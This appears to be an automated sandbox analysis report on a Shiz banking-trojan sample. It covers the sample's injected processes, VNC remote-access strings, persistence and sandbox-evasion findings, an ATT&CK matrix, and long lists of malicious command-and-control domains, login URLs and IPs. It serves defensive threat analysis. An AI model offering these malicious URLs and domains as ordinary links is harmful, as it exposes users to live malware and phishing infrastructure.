      Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000023.00000002.2084784998.0000000003290000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089692841.0000000002650000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000025.00000002.2089952227.00000000027F0000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: RFB 003.006
      Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: $BRFB 003.006
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D398E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,1_2_02D398E0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D4FFE0 setsockopt,htons,socket,setsockopt,bind,1_2_02D4FFE0
      Source: C:\Windows\apppatch\svchost.exeCode function: 1_2_02D50DB0 htons,socket,setsockopt,closesocket,bind,listen,1_2_02D50DB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028A98E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,5_2_028A98E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028BFFE0 setsockopt,htons,socket,setsockopt,bind,5_2_028BFFE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 5_2_028C0DB0 htons,socket,setsockopt,closesocket,bind,listen,5_2_028C0DB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_024598E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,6_2_024598E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_0246FFE0 setsockopt,htons,socket,setsockopt,bind,6_2_0246FFE0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 6_2_02470DB0 htons,socket,setsockopt,closesocket,bind,listen,6_2_02470DB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_012F98E0 WSAStartup,ExitThread,socket,ExitThread,htons,htons,htons,bind,ExitThread,listen,ExitThread,gethostname,gethostbyname,inet_ntoa,accept,accept,getpeername,inet_ntoa,htons,CreateThread,CloseHandle,accept,ExitThread,closesocket,ExitThread,8_2_012F98E0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_01310DB0 htons,socket,setsockopt,closesocket,bind,listen,8_2_01310DB0
      Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exeCode function: 8_2_0130FFE0 setsockopt,htons,socket,setsockopt,bind,8_2_0130FFE0
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts34
      Native API
      1
      DLL Side-Loading
      1
      Abuse Elevation Control Mechanism
      1
      Disable or Modify Tools
      111
      Input Capture
      2
      System Time Discovery
      1
      Remote Desktop Protocol
      1
      Archive Collected Data
      4
      Ingress Tool Transfer
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts2
      Command and Scripting Interpreter
      1
      Create Account
      1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      LSASS Memory11
      Account Discovery
      Remote Desktop Protocol1
      Screen Capture
      11
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts1
      Scheduled Task/Job
      1
      Scheduled Task/Job
      623
      Process Injection
      1
      Abuse Elevation Control Mechanism
      Security Account Manager1
      System Network Connections Discovery
      SMB/Windows Admin Shares111
      Input Capture
      11
      Non-Standard Port
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron21
      Registry Run Keys / Startup Folder
      1
      Scheduled Task/Job
      2
      Obfuscated Files or Information
      NTDS2
      File and Directory Discovery
      Distributed Component Object Model2
      Clipboard Data
      1
      Remote Access Software
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchd1
      Bootkit
      21
      Registry Run Keys / Startup Folder
      3
      Software Packing
      LSA Secrets143
      System Information Discovery
      SSHKeylogging3
      Non-Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials1
      Query Registry
      VNCGUI Input Capture14
      Application Layer Protocol
      Data Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items321
      Masquerading
      DCSync561
      Security Software Discovery
      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
      Virtualization/Sandbox Evasion
      Proc Filesystem241
      Virtualization/Sandbox Evasion
      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt623
      Process Injection
      /etc/passwd and /etc/shadow13
      Process Discovery
      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
      Bootkit
      Network Sniffing11
      Application Window Discovery
      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
      System Owner/User Discovery
      Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1498165 Sample: Bonelessness.exe Startdate: 23/08/2024 Architecture: WINDOWS Score: 100 49 www.sedoparking.com 2->49 51 vowyzuf.com 2->51 53 1009 other IPs or domains 2->53 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Antivirus detection for URL or domain 2->77 79 21 other signatures 2->79 9 Bonelessness.exe 2 3 2->9         started        13 svchost.exe 66 2->13         started        signatures3 process4 file5 45 C:\Windows\apppatch\svchost.exe, PE32 9->45 dropped 47 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 9->47 dropped 81 Detected unpacking (changes PE section rights) 9->81 83 Detected unpacking (overwrites its own PE header) 9->83 85 Moves itself to temp directory 9->85 87 8 other signatures 9->87 15 svchost.exe 94 9->15         started        19 WerFault.exe 2 13->19         started        21 WerFault.exe 2 13->21         started        23 WerFault.exe 13->23         started        25 12 other processes 13->25 signatures6 process7 dnsIp8 59 pufyjag.com 15->59 61 lysynur.com 15->61 63 31 other IPs or domains 15->63 65 System process connects to network (likely due to code injection or exploit) 15->65 67 Detected unpacking (changes PE section rights) 15->67 69 Detected unpacking (overwrites its own PE header) 15->69 71 19 other signatures 15->71 27 JbrLYfXaOpqnSngA.exe 1 15->27 injected 30 JbrLYfXaOpqnSngA.exe 15->30 injected 32 JbrLYfXaOpqnSngA.exe 15->32 injected 34 13 other processes 15->34 signatures9 process10 signatures11 89 Monitors registry run keys for changes 27->89 91 Creates an autostart registry key pointing to binary in C:\Windows 27->91 93 Contains VNC / remote desktop functionality (version string found) 27->93 36 WerFault.exe 27->36         started        95 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->95 97 Found direct / indirect Syscall (likely to bypass EDR) 30->97 38 WerFault.exe 34->38         started        41 WerFault.exe 34->41         started        43 WerFault.exe 34->43         started        process12 dnsIp13 55 pujylyv.com 38->55 57 qebyhuq.com 41->57

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      Bonelessness.exe96%ReversingLabsWin32.Trojan.Shiz
      Bonelessness.exe100%AviraTR/Spy.Shiz.avskt
      Bonelessness.exe100%Joe Sandbox ML
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://api.w.org/0%URL Reputationsafe
      http://lyrysor.com/login.php100%Avira URL Cloudphishing
      http://gadyniw.com/login.phpMy100%Avira URL Cloudmalware
      http://lyvyxor.com/login.php100%Avira URL Cloudmalware
      http://galynuh.com/login.php.100%Avira URL Cloudmalware
      http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxv100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff20%Avira URL Cloudsafe
      https://domaincntrol.com/?orighost=0%Avira URL Cloudsafe
      https://nojs.domaincntrol.com0%Avira URL Cloudsafe
      http://puzylyp.com/login.php100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff20%Avira URL Cloudsafe
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf0%Avira URL Cloudsafe
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix0%Avira URL Cloudsafe
      http://vojyqem.com/login.phpTemp100%Avira URL Cloudmalware
      http://galynuh.com/login.php100%Avira URL Cloudmalware
      http://lyxynyx.com/login.php100%Avira URL Cloudmalware
      http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&100%Avira URL Cloudmalware
      http://qetyhyg.com/login.php100%Avira URL Cloudphishing
      http://lymyxid.com/login.php100%Avira URL Cloudmalware
      http://galyqaz.com/display.cfm100%Avira URL Cloudmalware
      http://vojyqem.com/login.php100%Avira URL Cloudmalware
      http://puzylyp.com/login.phpMy100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular0%Avira URL Cloudsafe
      http://qegyval.com/login.php100%Avira URL Cloudmalware
      http://vocyzit.com/login100%Avira URL Cloudmalware
      http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco100%Avira URL Cloudmalware
      http://gahyhiz.com/login.php0%Avira URL Cloudsafe
      http://gadyniw.com/login.php100%Avira URL Cloudmalware
      http://pupydeq.com/login.php100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)0%Avira URL Cloudsafe
      http://106.15.137.66:8001/dh/147287063_637385.html0%Avira URL Cloudsafe
      http://lygyvuj.com/login.php100%Avira URL Cloudphishing
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf0%Avira URL Cloudsafe
      https://img.sedoparking.com/templates/images/hero_nc.svg0%Avira URL Cloudsafe
      http://gadyciz.com/login.php100%Avira URL Cloudmalware
      http://galyqaz.com/Computerspiele.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4D100%Avira URL Cloudmalware
      http://ww3.galyqaz.com/100%Avira URL Cloudphishing
      http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comcom0%Avira URL Cloudsafe
      http://galyqaz.com/Networking_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52ya100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold0%Avira URL Cloudsafe
      https://qegyhig.com//100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix0%Avira URL Cloudsafe
      http://gadyniw.com/login.php3100%Avira URL Cloudmalware
      http://galyqaz.com/IT_Services.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2o100%Avira URL Cloudmalware
      http://www.gahyqah.com/login.phpP100%Avira URL Cloudmalware
      https://dts.gnpge.com0%Avira URL Cloudsafe
      http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cC100%Avira URL Cloudmalware
      http://gatyhub.com/login.php100%Avira URL Cloudmalware
      https://www.namecheap.com/domains/registration/results/?domain=gahyqah.com0%Avira URL Cloudsafe
      http://lyvyxor.com/login.php_L100%Avira URL Cloudmalware
      https://cdn.consentmanager.net0%Avira URL Cloudsafe
      http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181100%Avira URL Cloudmalware
      https://lysyvan.com/100%Avira URL Cloudmalware
      http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c100%Avira URL Cloudmalware
      https://lysyvan.com/wp-json/100%Avira URL Cloudmalware
      http://qegyhig.com/login.phpAppData100%Avira URL Cloudmalware
      http://lysyfyj.com/login.php100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/pics/28903/search.png)0%Avira URL Cloudsafe
      http://galyqaz.com/Search_Engine_Ranking.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf0%Avira URL Cloudsafe
      http://vocyzit.com/login.php100%Avira URL Cloudmalware
      http://galyqaz.com/login.php100%Avira URL Cloudmalware
      http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com00%Avira URL Cloudsafe
      http://www.gahyqah.com/login.php100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot0%Avira URL Cloudsafe
      http://www.google.com0%Avira URL Cloudsafe
      https://qegyhig.com/wp-json/100%Avira URL Cloudmalware
      http://gatyfus.com/login.phpd%100%Avira URL Cloudmalware
      http://gatyfus.com/login.php100%Avira URL Cloudmalware
      http://www.google.coml0%Avira URL Cloudsafe
      http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.com0%Avira URL Cloudsafe
      https://delivery.consentmanager.net0%Avira URL Cloudsafe
      http://www.google.comt0%Avira URL Cloudsafe
      http://galyqaz.com/login.php0100%Avira URL Cloudmalware
      https://qegyhig.com/login.php100%Avira URL Cloudmalware
      https://qegyhig.com/100%Avira URL Cloudmalware
      http://lysyvan.com/login.php100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot0%Avira URL Cloudsafe
      http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)0%Avira URL Cloudsafe
      http://106.15.137.66:8001/dh/147287063_637385.html#index8?d=lyrysor.comhttp://106.15.137.66:8001/dh/0%Avira URL Cloudsafe
      http://qetyfuv.com/login.php100%Avira URL Cloudmalware
      http://qexyhuv.com/login.php100%Avira URL Cloudmalware
      http://vonypom.com/login.php100%Avira URL Cloudmalware
      https://www.sedo.com/services/parking.php30%Avira URL Cloudsafe
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff0%Avira URL Cloudsafe
      http://pupycag.com/login.php100%Avira URL Cloudphishing
      http://vofycot.com/login.php100%Avira URL Cloudmalware
      http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4100%Avira URL Cloudmalware
      https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf0%Avira URL Cloudsafe
      http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGttL7M52yaSTG4DW2oyV100%Avira URL Cloudmalware
      http://ww3.galyqaz.com/DigiCert100%Avira URL Cloudphishing
      http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co100%Avira URL Cloudmalware
      http://i2.cdn-image.com/__media__/js/min.js?v2.30%Avira URL Cloudsafe
      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff0%Avira URL Cloudsafe
      https://qegyhig.com/m/100%Avira URL Cloudmalware
      https://lysyvan.com/login.php100%Avira URL Cloudmalware
      http://gadyniw.com/login.php/100%Avira URL Cloudmalware
      http://qegyhig.com/login.php100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      pupydeq.com
      13.248.169.48
      truetrue
        unknown
        pupycag.com
        18.208.156.248
        truetrue
          unknown
          lyvyxor.com
          208.100.26.245
          truetrue
            unknown
            77026.bodis.com
            199.59.243.226
            truetrue
              unknown
              lysyvan.com
              188.114.97.3
              truetrue
                unknown
                galynuh.com
                64.225.91.73
                truetrue
                  unknown
                  parkingpage.namecheap.com
                  91.195.240.19
                  truetrue
                    unknown
                    qegyhig.com
                    188.114.96.3
                    truetrue
                      unknown
                      gatyfus.com
                      85.17.31.82
                      truetrue
                        unknown
                        vonypom.com
                        18.208.156.248
                        truetrue
                          unknown
                          puzylyp.com
                          3.64.163.50
                          truetrue
                            unknown
                            qexyhuv.com
                            15.197.240.20
                            truetrue
                              unknown
                              pltraffic7.com
                              72.52.179.174
                              truetrue
                                unknown
                                gadyciz.com
                                44.221.84.105
                                truetrue
                                  unknown
                                  gadyniw.com
                                  154.212.231.82
                                  truetrue
                                    unknown
                                    lyxynyx.com
                                    103.224.212.210
                                    truetrue
                                      unknown
                                      www.sedoparking.com
                                      64.190.63.136
                                      truetrue
                                        unknown
                                        lygyvuj.com
                                        52.34.198.229
                                        truetrue
                                          unknown
                                          gahyqah.com
                                          162.255.119.102
                                          truetrue
                                            unknown
                                            sedoparking.com
                                            64.190.63.136
                                            truetrue
                                              unknown
                                              vocyzit.com
                                              44.221.84.105
                                              truetrue
                                                unknown
                                                galyqaz.com
                                                199.191.50.83
                                                truetrue
                                                  unknown
                                                  vofycot.com
                                                  103.224.182.252
                                                  truetrue
                                                    unknown
                                                    qetyhyg.com
                                                    64.225.91.73
                                                    truetrue
                                                      unknown
                                                      vojyqem.com
                                                      172.234.222.143
                                                      truetrue
                                                        unknown
                                                        gahyhiz.com
                                                        44.221.84.105
                                                        truetrue
                                                          unknown
                                                          qetyfuv.com
                                                          44.221.84.105
                                                          truetrue
                                                            unknown
                                                            lysyfyj.com
                                                            69.162.80.60
                                                            truetrue
                                                              unknown
                                                              gtm-sg-6l13ukk0m05.qu200.com
                                                              103.150.11.230
                                                              truetrue
                                                                unknown
                                                                lymyxid.com
                                                                3.94.10.34
                                                                truetrue
                                                                  unknown
                                                                  qegyval.com
                                                                  154.85.183.50
                                                                  truetrue
                                                                    unknown
                                                                    gatyzoz.com
                                                                    unknown
                                                                    unknowntrue
                                                                      unknown
                                                                      lykygaj.com
                                                                      unknown
                                                                      unknowntrue
                                                                        unknown
                                                                        qedyxel.com
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          qedyqup.com
                                                                          unknown
                                                                          unknowntrue
                                                                            unknown
                                                                            qekyluv.com
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              gatyrez.com
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                vofybic.com
                                                                                unknown
                                                                                unknowntrue
                                                                                  unknown
                                                                                  pujydag.com
                                                                                  unknown
                                                                                  unknowntrue
                                                                                    unknown
                                                                                    vojykom.com
                                                                                    unknown
                                                                                    unknowntrue
                                                                                      unknown
                                                                                      qetysuq.com
                                                                                      unknown
                                                                                      unknowntrue
                                                                                        unknown
                                                                                        vonyzut.com
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          pufyjuq.com
                                                                                          unknown
                                                                                          unknowntrue
                                                                                            unknown
                                                                                            pujytug.com
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              galyhiw.com
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                lykygun.com
                                                                                                unknown
                                                                                                unknowntrue
                                                                                                  unknown
                                                                                                  vopymyc.com
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    gatyfaz.com
                                                                                                    unknown
                                                                                                    unknowntrue
                                                                                                      unknown
                                                                                                      vojycit.com
                                                                                                      unknown
                                                                                                      unknowntrue
                                                                                                        unknown
                                                                                                        lyvymej.com
                                                                                                        unknown
                                                                                                        unknowntrue
                                                                                                          unknown
                                                                                                          lygyvar.com
                                                                                                          unknown
                                                                                                          unknowntrue
                                                                                                            unknown
                                                                                                            purygiv.com
                                                                                                            unknown
                                                                                                            unknowntrue
                                                                                                              unknown
                                                                                                              gahykeb.com
                                                                                                              unknown
                                                                                                              unknowntrue
                                                                                                                unknown
                                                                                                                purymog.com
                                                                                                                unknown
                                                                                                                unknowntrue
                                                                                                                  unknown
                                                                                                                  gadyzib.com
                                                                                                                  unknown
                                                                                                                  unknowntrue
                                                                                                                    unknown
                                                                                                                    ganyqow.com
                                                                                                                    unknown
                                                                                                                    unknowntrue
                                                                                                                      unknown
                                                                                                                      lyxysun.com
                                                                                                                      unknown
                                                                                                                      unknowntrue
                                                                                                                        unknown
                                                                                                                        puzyjyg.com
                                                                                                                        unknown
                                                                                                                        unknowntrue
                                                                                                                          unknown
                                                                                                                          vopydek.com
                                                                                                                          unknown
                                                                                                                          unknowntrue
                                                                                                                            unknown
                                                                                                                            qexyfuq.com
                                                                                                                            unknown
                                                                                                                            unknowntrue
                                                                                                                              unknown
                                                                                                                              gatykyh.com
                                                                                                                              unknown
                                                                                                                              unknowntrue
                                                                                                                                unknown
                                                                                                                                vocykem.com
                                                                                                                                unknown
                                                                                                                                unknowntrue
                                                                                                                                  unknown
                                                                                                                                  gahynus.com
                                                                                                                                  unknown
                                                                                                                                  unknowntrue
                                                                                                                                    unknown
                                                                                                                                    pumypop.com
                                                                                                                                    unknown
                                                                                                                                    unknowntrue
                                                                                                                                      unknown
                                                                                                                                      lyvysur.com
                                                                                                                                      unknown
                                                                                                                                      unknowntrue
                                                                                                                                        unknown
                                                                                                                                        puzypav.com
                                                                                                                                        unknown
                                                                                                                                        unknowntrue
                                                                                                                                          unknown
                                                                                                                                          galypob.com
                                                                                                                                          unknown
                                                                                                                                          unknowntrue
                                                                                                                                            unknown
                                                                                                                                            gacyqoz.com
                                                                                                                                            unknown
                                                                                                                                            unknowntrue
                                                                                                                                              unknown
                                                                                                                                              lykywid.com
                                                                                                                                              unknown
                                                                                                                                              unknowntrue
                                                                                                                                                unknown
                                                                                                                                                lykytin.com
                                                                                                                                                unknown
                                                                                                                                                unknowntrue
                                                                                                                                                  unknown
                                                                                                                                                  vofyref.com
                                                                                                                                                  unknown
                                                                                                                                                  unknowntrue
                                                                                                                                                    unknown
                                                                                                                                                    qekytig.com
                                                                                                                                                    unknown
                                                                                                                                                    unknowntrue
                                                                                                                                                      unknown
                                                                                                                                                      vocyzek.com
                                                                                                                                                      unknown
                                                                                                                                                      unknowntrue
                                                                                                                                                        unknown
                                                                                                                                                        puvypoq.com
                                                                                                                                                        unknown
                                                                                                                                                        unknowntrue
                                                                                                                                                          unknown
                                                                                                                                                          puvybeg.com
                                                                                                                                                          unknown
                                                                                                                                                          unknowntrue
                                                                                                                                                            unknown
                                                                                                                                                            pupydig.com
                                                                                                                                                            unknown
                                                                                                                                                            unknowntrue
                                                                                                                                                              unknown
                                                                                                                                                              pupyguq.com
                                                                                                                                                              unknown
                                                                                                                                                              unknowntrue
                                                                                                                                                                unknown
                                                                                                                                                                qedyqal.com
                                                                                                                                                                unknown
                                                                                                                                                                unknowntrue
                                                                                                                                                                  unknown
                                                                                                                                                                  vowymom.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknowntrue
                                                                                                                                                                    unknown
                                                                                                                                                                    purypol.com
                                                                                                                                                                    unknown
                                                                                                                                                                    unknowntrue
                                                                                                                                                                      unknown
                                                                                                                                                                      ganypeb.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknowntrue
                                                                                                                                                                        unknown
                                                                                                                                                                        vopymit.com
                                                                                                                                                                        unknown
                                                                                                                                                                        unknowntrue
                                                                                                                                                                          unknown
                                                                                                                                                                          vowyguf.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknowntrue
                                                                                                                                                                            unknown
                                                                                                                                                                            pupytiq.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknowntrue
                                                                                                                                                                              unknown
                                                                                                                                                                              lymyfoj.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknowntrue
                                                                                                                                                                                unknown
                                                                                                                                                                                vowyzuf.com
                                                                                                                                                                                unknown
                                                                                                                                                                                unknowntrue
                                                                                                                                                                                  unknown
                                                                                                                                                                                  gatyruw.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                    unknown
                                                                                                                                                                                    qebynyg.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                      unknown
                                                                                                                                                                                      puzymev.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                        unknown
                                                                                                                                                                                        pupymol.com
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                          unknown
                                                                                                                                                                                          vojycif.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                            unknown
                                                                                                                                                                                            qebyvyl.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                              unknown
                                                                                                                                                                                              lymysan.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknowntrue
                                                                                                                                                                                                unknown
                                                                                                                                                                                                qekynuq.com
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknowntrue
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  puryjil.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknowntrue
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    puvytuv.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknowntrue
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      galyzus.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknowntrue
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        gadyfuh.com
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknowntrue
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          vofycyk.com
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          unknowntrue
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            lyxywer.com
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            unknowntrue
                                                                                                                                                                                                              unknown
